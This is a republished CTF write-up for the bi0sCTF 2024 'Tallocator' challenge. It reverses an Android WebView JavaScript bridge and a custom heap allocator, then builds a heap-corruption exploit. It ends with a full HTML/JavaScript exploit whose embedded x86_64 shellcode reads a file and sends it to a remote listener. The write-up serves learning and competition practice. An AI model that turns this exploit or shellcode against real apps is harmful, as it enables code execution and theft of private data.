bi0sCTF 2024 Tallocator (未翻译)

WriteUp 4周前 admin
32 0 0

I had the pleasure of playing bi0sCTF 2024 last weekend. I must say I enjoyed it quite a lot and I was able to get third blood on this challenge which was a first for our newly formed team Team-915.

Introduction

Without further ado, moving on to the challenge, it had the following files in the handout

  1. chinmay@potato:~/Documents/CTF/bi0sCTF24/tallocator$ ls

  2. app.apk Dockerfile flag native.c readme.md script.py

I was already on the verge of tears seeing an apk but fortunately, the emulator for that apk runs on x86_64 instead of aarch64 so that was a relief.

Now to make sense out of the files, it seems script.py is the file that we interact with. It starts the emulator, starts ADB, installs the apk, starts it’s main activity, pushes flag into /data/data/bi0sctf.android.challenge/ and takes from us an input URL and broadcasts it with action "bi0sctf.android.DATA"(this will come into picture later since the apk waits for this broadcast). Phew, that’s a lot but fortunately, this is quite uninteresting so we don’t need to inspect the code.

Now moving on to the star of the show, app.apk, we first decompress it to see if there are any native libraries we need to take care of among other things that might be of interest.

Surely there are two native libs namely libnative.so and libtallocator.so. Also, on comparing function names we find that libnative.so‘s source code is given in the handout as native.c

  1. app/lib/

  2. ├── arm64-v8a

  3.    ├── libnative.so

  4.    └── libtallocator.so

  5. ├── armeabi-v7a

  6.    ├── libnative.so

  7.    └── libtallocator.so

  8. ├── x86

  9.    ├── libnative.so

  10.    └── libtallocator.so

  11. └── x86_64

  12. ├── libnative.so

  13. └── libtallocator.so

Dissecting app.apk

With all that background we are ready to reverse app.apk. We use dex2jar to transform the apk into a jar file and open it with jd-gui. Taking a look at the main activity, we find…

bi0sCTF 2024 Tallocator (未翻译)

The MainActivity onCreate function does two main things

  • it creates a BroadcastReciever which will recieve the broadcast on action "bi0sctf.android.DATA" from script.py through ADB which we talked about earlier and then it will load our URL supplied with the broadcast.

  • It creates what is called a JavascriptInterface named bi0sctf which means functions with decorator @JavascriptInterface can be called directly through Javascript in webpage loaded with loadURL in the WebVieww.

bi0sCTF 2024 Tallocator (未翻译)

We can see there are two functions marked as JavascriptInterface namely secure_talloc and secure_tree both call talloc and tree after a check on the first parameter which seems to be some sort of key.

bi0sCTF 2024 Tallocator (未翻译)

In classa we find that the check is implemented in libnative.so. Then we inspect native.c to find that there are like 7 functions and a Java_bi0sctf_android_challenge_a_check function which is imported as check in classa.

I am ashamed to admit it but a good chunk of time I spent on letting angr run on the check function to find the key, about 4-5 hours, before realising that it was arranging given 16 character long string as a 4×4 matrix and comparing its inverse with a hardcoded value. After a quick wolfram-alpha detour, I found the key…

  1. const key = "50133tbd5mrt1769";

The next part is reversing talloc and tree in libtallocator.so.

reversing talloc and tree

Before we jump into reversing I must mention that the talloc chunk is very similar to malloc chunk. It has a 8 byte size header with the least significant bit representing if the chunk is in use and the first 0x10 bytes when the chunk is free function as Flink and Blink of a doubly linked list.

talloc

  1. //Java_bi0sctf_android_challenge_MainActivity_talloc

  2. v6 = a1;

  3. if ( is_talloc_inited == 1 )

  4. {

  5. v7 = (_QWORD *)sbrk_ed;

  6. }

  7. else

  8. {

  9. a2 = 4096LL;

  10. qword_4150 = (__int64)mmap((void *)0x41410000, 0x1000uLL, 7, 34, -1, 0LL);

  11. is_talloc_inited = 1;

  12. a1 = 4096LL;

  13. v7 = sbrk(4096LL);

  14. sbrk_ed = (__int64)v7;

  15. v7[1] = 0x30LL;

  16. v7[7] = 0xFC8LL;

  17. v7[4] = 0x3A63LL;

  18. wilderness_s = (__int64)(v7 + 7);

  19. }

  20. v8 = (void (__fastcall *)(__int64, __int64))v7[5];

  21. if ( v8 ) // ticket to hollywood

  22. {

  23. v8(a1, a2);

  24. perror("Debugger called !!");

  25. }

There are several interesting things to note about talloc. If is_talloc_inited is not one it will be assigned one and

  • An rwx page will be mmaped at 0x41410000

  • sbrk will be called with size of a page and it’s pointer stored in sbrk_ed

  • A random flag value 0x3A63 will be written to sbrk_ed+0x20

  • 0xFC8 which is possibly the size of wilderness for this allocator is written to sbrk_ed+0x38

  • pointer to start of wilderness is written in wilderness_s

And finally function pointer at sbrk_ed+0x28 is called which is initailly 0, lets call this talloc_hook

  1. //Java_bi0sctf_android_challenge_MainActivity_talloc

  2. size = (data_size + 0x17) & 0xFFFFFFFFFFFFFFF0LL;

  3. if ( (unsigned int)size > 0x150 )

  4. {

  5. if ( (unsigned int)(size - 0x151) <= 0xEAE )

  6. {

  7. v21 = sbrk_ed;

  8. curr = *(_QWORD **)(sbrk_ed + 0x18);

  9. if ( curr )

  10. {

  11. diff = 0x7FFFFFFF;

  12. v24 = 19;

  13. found = 0LL;

  14. do

  15. {

  16. curr_size = *(curr - 1);

  17. if ( curr_size >= data_size )

  18. {

  19. v26 = size - curr_size;

  20. v27 = curr_size - size;

  21. if ( v27 < 0 )

  22. v27 = v26;

  23. if ( v27 < diff )

  24. {

  25. diff = v27;

  26. found = curr;

  27. }

  28. }

  29. curr = (_QWORD *)*curr;

  30. v28 = v24-- != 0;

  31. }

  32. while ( curr && v28 );

  33. if ( found )

  34. {

  35. if ( *found )

  36. *(_QWORD *)(*found + 8LL) = found[1];

  37. v29 = (_QWORD *)found[1];

  38. if ( v29 )

  39. *v29 = *found;

  40. }

  41. if ( *(_QWORD **)(v21 + 24) == found )

  42. {

  43. *(_QWORD *)(v21 + 24) = *found;

  44. goto LABEL_44;

  45. }

  46. LABEL_40:

  47. if ( found )

  48. goto LABEL_44;

  49. }

  50. }

  51. }

After this, talloc tries to find a free chunk with bigger size and minimum size difference in one of its two free doubly-linked lists (or tree lists if you will ;)) if the size is < 0x150 it goes for free list at sbrk_ed+0x10 otherwise if size is less than 0x1000 it goes for sbrk_ed+0x18. Then it proceeds to unsafe unlink the found entry. since the list traversal code is identical I have reproduced only code for chunks > 0x150 but < 0x1000 only.

  1. //Java_bi0sctf_android_challenge_MainActivity_talloc

  2. v30 = (_QWORD *)wilderness_s;

  3. if ( *(_QWORD *)wilderness_s < size )

  4. {

  5. perror("Cant give you more memory !!");

  6. v30 = (_QWORD *)wilderness_s;

  7. }

  8. found = v30 + 1;

  9. wilderness_s = (__int64)v30 + size;

  10. *(_QWORD *)((char *)v30 + size) = *v30 - size;

  11. *v30 = size;

  12. LABEL_44:

  13. input = (const void *)(*(__int64 (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)v6 + 1472LL))(v6, a4, 0LL);

  14. if ( input_size <= data_size )

  15. memcpy(found, input, input_size);

  16. v32 = *(found - 1);

  17. if ( (v32 & 1) != 0 )

  18. {

  19. printf("%s", "Overwriting Chunks !!");

  20. exit(0);

  21. }

  22. *(found - 1) = v32 | 1;

  23. return found;

finally, if there was no found entry via list traversal, talloc tries to break off a chunk of the wilderness. in any case at LABEL_44 found is populated with an address to which the supplied data is copied. And finally we reach our sole security check, a check if the least significant bit of size header is true, it functions as a in-use bit and the allocation can’t happen if chunk is in use leading to the program exit.

otherwise the in-use bit is set and the address is returned! Raw pointer in Javascript, pretty neat!

tree

  1. //Java_bi0sctf_android_challenge_MainActivity_tree

  2. v3 = *(a3 - 1);

  3. if ( (v3 & 1) == 0 )

  4. {

  5. printf("%s", "Double Tree !!");

  6. exit(0);

  7. }

  8. size = v3 & 0xFFFFFFFFFFFFFFFELL;

  9. *(a3 - 1) = size;

  10. v5 = (_QWORD *)wilderness_s;

  11. if ( (_QWORD *)wilderness_s != (_QWORD *)((char *)a3 + ((__int64)((size << 32) - 0x800000000LL) >> 32)) )

  12. {

  13. if ( (int)size > 0x100 )

  14. {

  15. v6 = *(_QWORD *)(sbrk_ed + 0x18);

tree first checks if the chunk is free if it is, that’s a double free and we scoot. Otherwise we clear the in-use bit and then using the convoluted check we check if we are not the last allocation before wilderness, in which case we are put in one of the free list depending on whether our size is < 0x100 ( sbrk_ed+0x10) or > 0x100 ( sbrk_ed+0x18).

  1. //Java_bi0sctf_android_challenge_MainActivity_tree

  2. if ( (int)size > 0x100 )

  3. {

  4. v6 = *(_QWORD *)(sbrk_ed + 24);

  5. v7 = sbrk_ed + 24;

  6. if ( v6 )

  7. goto LABEL_5;

  8. }

  9. else

  10. {

  11. v6 = *(_QWORD *)(sbrk_ed + 16);

  12. v7 = sbrk_ed + 16;

  13. if ( v6 )

  14. {

  15. LABEL_5:

  16. *a3 = v6;

  17. a3[1] = v7;

  18. *(_QWORD *)(*(_QWORD *)v7 + 8LL) = a3;

  19. LABEL_9:

  20. *(_QWORD *)v7 = a3;

  21. return 0LL;

  22. }

  23. }

  24. *a3 = 0LL;

  25. a3[1] = v7;

  26. goto LABEL_9;

Otherwise, if we are the chunk before wilderness, the wilderness is shrunk.

  1. //Java_bi0sctf_android_challenge_MainActivity_tree

  2. wilderness_s -= (int)size;

  3. *(_QWORD *)wilderness_s = *v5 - (int)size;

  4. *v5 = 0LL;

  5. return 0LL;

Exploitation

The road to exploitation is surprisingly simple from here. we need to:

  • Write shellcode that reads the flag file and sends it to our nc listener, to the rwx allocation at 0x41410008

  • Write 0x41410008 to the talloc_hook

Note that we are writing shellcode to 0x41410008 instead of 0x41410000 because we are going to allocate a fake chunk at 0x41410008 if we allocate it at 0x41410000 8 bytes before it where the header should be will be unmapped memory which will cause segfault.

Writing Shellcode

Since, all pieces are in place, let’s examine the final exploit step by step now.

  1. var arr = new Uint8Array(0x28);

  2. for (var i = 0; i < 0x28; i++) {

  3. arr[i] = 0;

  4. }

  5. arr[0x18] = 1;

  6. arr[0x19] = 1;

  7. arr[0x20] = 9;

  8. arr[0x22] = 0x41;

  9. arr[0x23] = 0x41;

  10. var ret = bi0sctf.secure_talloc(key, 0x28, arr);

  11. bi0sctf.secure_talloc(key, 0x10, arr);

bi0sCTF 2024 Tallocator (未翻译)

first I allocated a chunk of size 0x28 (size header 0x30) and a chunk of size 0x10 (size header 0x20), the latter prevents coalesence of the former with wilderness on free. Also, the 0x28 byte chunk contains a faux chunk header followed by address 0x41410009 at offset 0x18. The result should look as above.

  1. bi0sctf.secure_tree(key, ret + 0x20);

  2. bi0sctf.secure_tree(key, ret);

Assume that sbrk_ed=0x6900000000 then we get the following situation where our faux chunk is successfully injected into the small allocation list after the first secure_treebi0sCTF 2024 Tallocator (未翻译)After the second secure_tree this is the situation.bi0sCTF 2024 Tallocator (未翻译)

Now we reallocate allocation #1 and overwrite into faux chunk writing address 0x41410009 into it at it’s offset zero.

  1. arr[0x18] = 0;

  2. bi0sctf.secure_talloc(key, 0x28, arr);

The state of the list is as shown.bi0sCTF 2024 Tallocator (未翻译)

Now the list is in desirable state to use the 1 bit write at the end of talloc to forge a chunk of effective size 0x100 at 0x41410008. We then execute.

  1. bi0sctf.secure_talloc(key, -23, arr);

this will trigger talloc to find an allocation with size header zero or more, 0x41410009 will be picked becuase the value of curr_size for it will be 0 and it will minimize the difference between size and curr_size. Thus 1 bit will be written at 0x41410001 as the in-use bit.

bi0sCTF 2024 Tallocator (未翻译)

then we run the following instructions.

  1. arr[0x20] = 8;

  2. bi0sctf.secure_tree(key, ret);

  3. bi0sctf.secure_talloc(key, 0x28, arr);

to bring talloc to this state.

bi0sCTF 2024 Tallocator (未翻译)

from here it is easy to see that allocations of size 0xf0 will first pop our faux chunk and then address 0x41410008. We execute…

  1. bi0sctf.secure_talloc(key, 0xf0, smarr);

  2. bi0sctf.secure_talloc(key, 0xf0, sharr);

where smarr is a small array containing 0x41410008 address but this can be any arbitrary Uint8Array and sharr is the shellcode containing array.

And in this way we have written shellcode successfully to address 0x41410008. Next we have to overwrite talloc_hook which is surprisingly simple.

Overwriting talloc_hook

We noted earlier that constant 0x3A63 is written at sbrk_ed+0x20. The initial layout near sbrk_ed is as follows

bi0sCTF 2024 Tallocator (未翻译)

Since the least significant bit of 0x3A63 is 1 we can free sbrk+0x28 and it will be put into the big allocation list.

  1. bi0sctf.secure_tree(key, ret - 0x18);

after this secure_tree the state of talloc is

bi0sCTF 2024 Tallocator (未翻译)

Now we can request any allocation of size greater than 0x150 and sbrk+0x28 or talloc_hook will be returned. Also note that talloc_hook is still zero saving us from any unwanted side effects.

  1. bi0sctf.secure_talloc(key, 0x160, smarr);

Now talloc_hook is overwritten with 0x41410008. Bazinga!

bi0sCTF 2024 Tallocator (未翻译)

trigger talloc_hook

  1. bi0sctf.secure_talloc(key, 0x10, smarr);

Victory?

The only problem that remained was that I did not have anywhere to host a nc listener to get the flag. I tried all possible ways and after a bucket load of disappointments and frustration, I finally used ngrok to tcp forward traffic to a local listener and hosted my exploit on this very blog. And finally, FLAG!!!!

bi0sCTF 2024 Tallocator (未翻译)

  1. bi0sctf{y0u_h4v3_t4ll0c3d_y0ur_w4y_thr0ugh_1281624072}

Full Exploit

  1. <html>

  2. <Body>

  3. <script>

  4. const key = "50133tbd5mrt1769";

  5. const shellcode = [0x48, 0x31, 0xC0, 0x48, 0x83, 0xC0, 0x29, 0x48, 0x31, 0xFF, 0x48, 0x89, 0xFA, 0x48, 0x83, 0xC7, 0x02, 0x48, 0x31, 0xF6, 0x48, 0x83, 0xC6, 0x01, 0x0F, 0x05, 0x48, 0x89, 0xC7, 0x48, 0x31, 0xC0, 0x50, 0x48, 0x83, 0xC0, 0x02, 0xC7, 0x44, 0x24, 0xFC, 0xC0, 0xA8, 0x01, 0x02, 0x66, 0xC7, 0x44, 0x24, 0xFA, 0x11, 0x5C, 0x66, 0x89, 0x44, 0x24, 0xF8, 0x48, 0x83, 0xEC, 0x08, 0x48, 0x83, 0xC0, 0x28, 0x48, 0x89, 0xE6, 0x48, 0x31, 0xD2, 0x48, 0x83, 0xC2, 0x10, 0x0F, 0x05, 0x57, 0x48, 0x31, 0xD2, 0x48, 0x89, 0xD6, 0x48, 0x8D, 0x3D, 0x19, 0x00, 0x00, 0x00, 0x6A, 0x02, 0x58, 0x0F, 0x05, 0x5F, 0x48, 0x89, 0xC6, 0x48, 0x31, 0xD2, 0x68, 0xE8, 0x03, 0x00, 0x00, 0x41, 0x5A, 0x6A, 0x28, 0x58, 0x0F, 0x05, 0xCC, 0x2F, 0x64, 0x61, 0x74, 0x61, 0x2F, 0x64, 0x61, 0x74, 0x61, 0x2F, 0x62, 0x69, 0x30, 0x73, 0x63, 0x74, 0x66, 0x2E, 0x61, 0x6E, 0x64, 0x72, 0x6F, 0x69, 0x64, 0x2E, 0x63, 0x68, 0x61, 0x6C, 0x6C, 0x65, 0x6E, 0x67, 0x65, 0x2F, 0x66, 0x6C, 0x61, 0x67, 0x00];

  6. var arr = new Uint8Array(0x28);

  7. for (var i = 0; i < 0x28; i++) {

  8. arr[i] = 0;

  9. }

  10. arr[0x18] = 1;

  11. arr[0x19] = 1;

  12. arr[0x20] = 9;

  13. arr[0x22] = 0x41;

  14. arr[0x23] = 0x41;

  15. var ret = bi0sctf.secure_talloc(key, 0x28, arr);

  16. bi0sctf.secure_talloc(key, 0x10, arr);

  17. bi0sctf.secure_tree(key, ret + 0x20);

  18. bi0sctf.secure_tree(key, ret);

  19. arr[0x18] = 0;

  20. bi0sctf.secure_talloc(key, 0x28, arr);

  21. bi0sctf.secure_talloc(key, -23, arr);

  22. var sharr = new Uint8Array(shellcode.length);

  23. for (var i = 0; i < shellcode.length; i++) {

  24. sharr[i] = shellcode[i];

  25. }

  26. // substitute IP

  27. sharr[0x29] = 192;

  28. sharr[0x2a] = 168;

  29. sharr[0x2b] = 1;

  30. sharr[0x2c] = 1;

  31. // substitute port

  32. sharr[0x32] = 0x00;

  33. sharr[0x33] = 80;

  34. arr[0x20] = 8;

  35. bi0sctf.secure_tree(key, ret);

  36. bi0sctf.secure_talloc(key, 0x28, arr);

  37. var smarr = new Uint8Array(8);

  38. for (var i = 0; i < 8; i++) {

  39. smarr[i] = 0;

  40. }

  41. smarr[0] = 8;

  42. smarr[2] = 0x41;

  43. smarr[3] = 0x41;

  44. bi0sctf.secure_talloc(key, 0xf0, smarr);

  45. bi0sctf.secure_talloc(key, 0xf0, sharr);

  46. bi0sctf.secure_tree(key, ret - 0x18);

  47. bi0sctf.secure_talloc(key, 0x160, smarr);

  48. bi0sctf.secure_talloc(key, 0x10, smarr);

  49. </script>

  50. </Body>

  51. </html>



官方writeup

https://blog.bi0s.in/2024/02/26/Pwn/Tallocator-bi0sctf2024/

原文始发于微信公众号(3072):bi0sCTF 2024 Tallocator (未翻译)

版权声明:admin 发表于 2024年5月20日 下午6:51。
转载请注明:bi0sCTF 2024 Tallocator (未翻译) | CTF导航

相关文章